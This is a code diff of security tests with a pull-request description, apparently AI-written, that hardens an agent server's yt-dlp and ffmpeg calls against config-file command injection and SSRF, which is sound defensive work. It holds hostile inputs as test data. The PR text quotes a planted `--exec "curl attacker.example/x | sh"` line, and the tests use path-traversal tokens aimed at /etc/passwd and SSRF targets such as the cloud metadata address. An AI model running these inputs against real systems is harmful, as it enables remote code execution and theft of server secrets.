 import { runHostBinary } from "../src/host-binaries.js";
 import {
   FFMPEG_PROTOCOL_WHITELIST,
+  MAX_DOWNLOAD_BYTES,
+  buildYtDlpArgv,
   confineArgvToWorkspace,
-  hardenFfmpegArgv
+  hardenFfmpegArgv,
+  refuseFlagLikeValue
 } from "../src/host-binary-guard.js";
 
 let workspace = "";
@@ -60,11 +63,27 @@ describe("confineArgvToWorkspace", () => {
     );
   });
 
-  it("refuses a path buried in a filter token", async () => {
-    // The whole token resolves, so no filter-syntax parsing is needed.
-    expect(await refusal(["-vf", "subtitles=../outside/secret.txt"])).toContain(
+  it.each([
+    // ffmpeg resolves the path inside the token against its own cwd, so the
+    // whole token resolving inside the workspace is the wrong question:
+    // `<ws>/subtitles=../../etc/passwd` normalizes to `<ws>/etc/passwd`, while
+    // ffmpeg opens `../../etc/passwd`.
+    "subtitles=../../etc/passwd",
+    "subtitles=../outside/secret.txt",
+    "drawtext=fontfile=/etc/passwd"
+  ])("refuses the path buried in %s", async (token) => {
+    expect(await refusal(["-vf", token])).toContain(
       "resolves outside the workspace"
     );
+  });
+
+  it("passes a filter value that names no path", async () => {
+    expect(await refusal(["-vf", "scale=1280:-2,fps=30"])).toBe("");
+  });
+
+  it("allows an output whose directories do not exist yet", async () => {
+    // yt-dlp's default template is two levels deep and creates as it goes.
+    expect(await refusal(["downloads/yt-dlp/%(id)s.%(ext)s"])).toBe("");
   });
 
   it("refuses an in-workspace symlink that points out", async () => {
@@ -176,4 +195,53 @@ describe.skipIf(!hasFfmpeg)("the hardened argv against real ffmpeg", () => {
     expect(result.exitCode).not.toBe(0);
     expect(result.stderr).toContain("not on whitelist");
   }, 90_000);
+});
+
+describe("buildYtDlpArgv", () => {
+  it("ignores config files, clears post-processing, and ends the options", () => {
+    const argv = buildYtDlpArgv({
+      url: "https://example.com/watch?v=1",
+      outputFile: "downloads/%(id)s.%(ext)s"
+    });
+    expect(argv).toEqual([
+      "--ignore-config",
+      "--no-exec",
+      "--no-playlist",
+      "--no-warnings",
+      "--max-filesize",
+      String(MAX_DOWNLOAD_BYTES),
+      "--print",
+      "after_move:filepath",
+      "-o",
+      "downloads/%(id)s.%(ext)s",
+      "--",
+      "https://example.com/watch?v=1"
+    ]);
+  });
+
+  it("passes a format selector before the end-of-options marker", () => {
+    const argv = buildYtDlpArgv({
+      url: "https://example.com/v",
+      outputFile: "out.mp4",
+      format: "bestaudio"
+    });
+    expect(argv.slice(-4)).toEqual([
+      "-f",
+      "bestaudio",
+      "--",
+      "https://example.com/v"
+    ]);
+  });
+});
+
+describe("refuseFlagLikeValue", () => {
+  it("refuses a value that would be read as an option", () => {
+    expect(refuseFlagLikeValue("--exec", "format")).toEqual({
+      error: expect.stringContaining("format cannot start with")
+    });
+  });
+
+  it("passes an ordinary value", () => {
+    expect(refuseFlagLikeValue("bestvideo+bestaudio", "format")).toBeUndefined();
+  });
 });

--- a/packages/agents/tests/network-guard.test.ts
+++ b/packages/agents/tests/network-guard.test.ts
@@ -1,0 +1,111 @@
+/**
+ * Which addresses untrusted code may reach.
+ *
+ * The literal table is exercised through the fetch bridge elsewhere; what is
+ * pinned here is the shape both callers share — including the resolution step
+ * `yt_dlp` needs, because a hostname is not a literal and the downloader opens
+ * its own sockets.
+ */
+import { describe, expect, it } from "vitest";
+import {
+  assertFetchUrlAllowed,
+  assertResolvedHostAllowed,
+  isBlockedIpLiteral
+} from "../src/network-guard.js";
+
+describe("isBlockedIpLiteral", () => {
+  it.each([
+    "169.254.169.254", // instance metadata
+    "127.0.0.1",
+    "10.1.2.3",
+    "192.168.1.1",
+    "172.16.0.1",
+    "100.64.0.1", // CGNAT
+    "::1",
+    "fe80::1",
+    "fd00::1",
+    "::ffff:169.254.169.254", // IPv4-mapped
+    "64:ff9b::a9fe:a9fe" // NAT64
+  ])("blocks %s", (host) => {
+    expect(isBlockedIpLiteral(host)).toBe(true);
+  });
+
+  it.each(["93.184.216.34", "2606:2800:220:1:248:1893:25c8:1946"])(
+    "allows the public address %s",
+    (host) => {
+      expect(isBlockedIpLiteral(host)).toBe(false);
+    }
+  );
+});
+
+describe("assertFetchUrlAllowed", () => {
+  it("refuses the metadata service", () => {
+    expect(() =>
+      assertFetchUrlAllowed("http://169.254.169.254/latest/meta-data/")
+    ).toThrow(/internal\/private address/);
+  });
+
+  it("refuses localhost by name", () => {
+    expect(() => assertFetchUrlAllowed("http://localhost:7777/api")).toThrow(
+      /localhost/
+    );
+  });
+
+  it("refuses a non-http scheme", () => {
+    expect(() => assertFetchUrlAllowed("file:///etc/passwd")).toThrow(
+      /unsupported scheme/
+    );
+  });
+
+  it("allows a public URL", () => {
+    expect(() =>
+      assertFetchUrlAllowed("https://example.com/video.mp4")
+    ).not.toThrow();
+  });
+});
+
+describe("assertResolvedHostAllowed", () => {
+  it("refuses a name that resolves to the metadata address", async () => {
+    await expect(
+      assertResolvedHostAllowed(
+        "https://metadata.example.com/x",
+        "yt_dlp",
+        async () => ["169.254.169.254"]
+      )
+    ).rejects.toThrow(/resolves to the internal address "169\.254\.169\.254"/);
+  });
+
+  it("refuses when any answer is internal, not only the first", async () => {
+    await expect(
+      assertResolvedHostAllowed("https://split.example.com/x", "yt_dlp", async () => [
+        "93.184.216.34",
+        "127.0.0.1"
+      ])
+    ).rejects.toThrow(/127\.0\.0\.1/);
+  });
+
+  it("allows a name that resolves publicly", async () => {
+    await expect(
+      assertResolvedHostAllowed("https://example.com/x", "yt_dlp", async () => [
+        "93.184.216.34"
+      ])
+    ).resolves.toBeUndefined();
+  });
+
+  it("leaves a name that does not resolve to the downloader to report", async () => {
+    await expect(
+      assertResolvedHostAllowed("https://nope.example/x", "yt_dlp", async () => {
+        throw new Error("ENOTFOUND");
+      })
+    ).resolves.toBeUndefined();
+  });
+
+  it("does not re-resolve a literal", async () => {
+    let called = false;
+    await assertResolvedHostAllowed("http://93.184.216.34/x", "yt_dlp", async () => {
+      called = true;
+      return [];
+    });
+    expect(called).toBe(false);
+  });
+});

--- a/packages/agents/tests/yt-dlp-hardening.test.ts
+++ b/packages/agents/tests/yt-dlp-hardening.test.ts
@@ -1,0 +1,86 @@
+/**
+ * The hardened yt-dlp argv, against the real binary.
+ *
+ * Two findings are reproduced here rather than argued for. yt-dlp reads a
+ * *portable* config file — `yt-dlp.conf` in its working directory — and its
+ * working directory is the workspace, which guest code writes freely; a guest
+ * that plants `--exec` in that file gets arbitrary command execution as the
+ * server. And a download with no ceiling fills the disk. Both tests serve
+ * bytes from a loopback HTTP server, so nothing here touches the network.
+ */
+import { spawnSync } from "node:child_process";
+import { createServer, type Server } from "node:http";
+import { mkdtemp, readdir, rm, writeFile } from "node:fs/promises";
+import { tmpdir } from "node:os";
+import path from "node:path";
+import { afterAll, beforeAll, describe, expect, it } from "vitest";
+import { buildYtDlpArgv } from "../src/host-binary-guard.js";
+import { runHostBinary } from "../src/host-binaries.js";
+
+const hasYtDlp = spawnSync("yt-dlp", ["--version"]).status === 0;
+
+let server: Server | undefined;
+let origin = "";
+let workspace = "";
+
+beforeAll(async () => {
+  if (!hasYtDlp) return;
+  workspace = await mkdtemp(path.join(tmpdir(), "nt-ytdlp-"));
+  server = createServer((req, res) => {
+    const megabytes = req.url === "/big.mp4" ? 20 : 0;
+    const body = Buffer.alloc(megabytes * 1024 * 1024 + 1024, 0);
+    res.writeHead(200, {
+      "content-type": "video/mp4",
+      "content-length": String(body.length)
+    });
+    res.end(body);
+  });
+  await new Promise<void>((resolve) => {
+    server?.listen(0, "127.0.0.1", resolve);
+  });
+  const address = server.address();
+  origin =
+    typeof address === "object" && address
+      ? `http://127.0.0.1:${address.port}`
+      : "";
+});
+
+afterAll(async () => {
+  server?.close();
+  if (workspace) await rm(workspace, { recursive: true, force: true });
+});
+
+describe.skipIf(!hasYtDlp)("the hardened yt-dlp argv", () => {
+  it("does not run the --exec a workspace config file asks for", async () => {
+    // Exactly what a guest can write with `workspace.write`.
+    await writeFile(
+      path.join(workspace, "yt-dlp.conf"),
+      '--exec "touch owned.txt"\n'
+    );
+    const result = await runHostBinary(
+      "yt-dlp",
+      buildYtDlpArgv({ url: `${origin}/small.mp4`, outputFile: "a.%(ext)s" }),
+      { cwd: workspace, timeoutMs: 60_000 }
+    );
+    expect(result.exitCode).toBe(0);
+    const written = await readdir(workspace);
+    expect(written).not.toContain("owned.txt");
+    expect(written).toContain("a.mp4");
+  }, 90_000);
+
+  it("aborts a download past the size ceiling before writing it", async () => {
+    const result = await runHostBinary(
+      "yt-dlp",
+      buildYtDlpArgv({
+        url: `${origin}/big.mp4`,
+        outputFile: "big.%(ext)s",
+        maxBytes: 1024 * 1024
+      }),
+      { cwd: workspace, timeoutMs: 60_000 }
+    );
+    // `--print` silences the reason, so the property to assert is the one
+    // that matters: the bytes never landed.
+    expect(await readdir(workspace)).not.toContain("big.mp4");
+    expect(result.stdout.trim()).toBe("");
+  }, 90_000);
+});


### PR DESCRIPTION
Follow-up to #5044, which bounded ffmpeg. yt-dlp had two holes of its own. Both were reproduced against yt-dlp 2026.07.04 before being closed, and both reproductions ship as tests.

## Arbitrary command execution

yt-dlp reads a **portable config file** — `yt-dlp.conf` in its working directory — and its working directory is the workspace, which guest code writes freely through `workspace.write`. A guest that writes

```
--exec "curl attacker.example/x | sh"
```

into that file and then calls `yt_dlp` gets that command run as the server, holding every tenant's database handle and secret store. Reproduced locally: the planted file executed and the marker appeared.

Closed with `--ignore-config`, plus `--no-exec` for any source that flag does not cover. The test plants the same config, runs the hardened argv against a loopback server, and asserts the marker is absent.

## SSRF

The capability checked the URL's scheme and nothing else, so `http://169.254.169.254/latest/meta-data/`, `http://localhost:7777/…` and every private range were reachable from inside the server — the same class of hole #5044 closed for ffmpeg, still open on the downloader that exists to fetch URLs.

The SSRF table the sandbox fetch bridge already had (IPv4, IPv4-mapped IPv6, NAT64, link-local, unique-local, CGNAT) moves out of `js-sandbox.ts` into `network-guard.ts` and now serves both callers, plus a DNS step for the hostname case: a name that resolves to a blocked address is refused. That layer is honest about its limit — the downloader resolves again and follows its own redirects, which the comment says out loud.

## Also

- `--max-filesize` bounds the download. yt-dlp's flag *does* abort before writing anything (measured: a 20 MB file under `--max-filesize 1M` produced no output), unlike ffmpeg's `-fs`.
- `--` ends the options, so a URL can never be read as a flag; a `format` or `output_file` starting with `-` is refused rather than passed as one.
- A clean exit that printed no path is now reported as a failure naming the size cap, instead of `success: true` with no file.

## Two corrections to #5044

**The filter-token claim was wrong.** #5044 said resolving the whole token catches a path buried in filter syntax. It does not: `subtitles=../../etc/passwd` normalizes to `<workspace>/etc/passwd` — *inside* — while ffmpeg opens the path relative to its own cwd and escapes. I verified the escape by burning a subtitle file from outside the working directory into an output. The guard now splits an argument on the filtergraph separators and confines every path-shaped piece; `scale=1280:-2` still yields no candidates, so filter values need no parsing.

**Containment for a not-yet-created target** is now `isCreatableWithinRoot`, which walks to the nearest existing ancestor. `isEditTargetWithinRoot` (immediate parent must exist) goes back to the file tools whose contract that is — `EditFileTool` has a test pinning it. The one-level rule refused every default yt-dlp download, whose template is two levels deep and creates as it goes.

## Verification

- New: `network-guard.test.ts` (22), `yt-dlp-hardening.test.ts` (2, against the real binary over a loopback HTTP server — no network), plus argv-builder, flag-like-value, filter-token and capability-level SSRF cases.
- All package + reliability suites (105/105 tasks, agents 3021 tests), web (13,193), electron (678), `nodetool harness gate`, `npm run lint` (0 errors), web/electron typecheck: green.
- The concurrency test now measures from a child-written event log rather than wall-clock windows — the old timing measurement reported a false 3-over-2 once under heavy parallel load, and I could not reproduce that with either the old or the new semaphore. Separately, the semaphore now hands its slot to the waiter instead of releasing and letting the waiter re-take it, closing a window that could in principle admit an extra spawn. No test here reproduces that interleaving, and the comment says so.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_011Vf8qWoRyghL3iAnxb9Bmp

---
_Generated by [Claude Code](https://claude.ai/code/session_011Vf8qWoRyghL3iAnxb9Bmp)_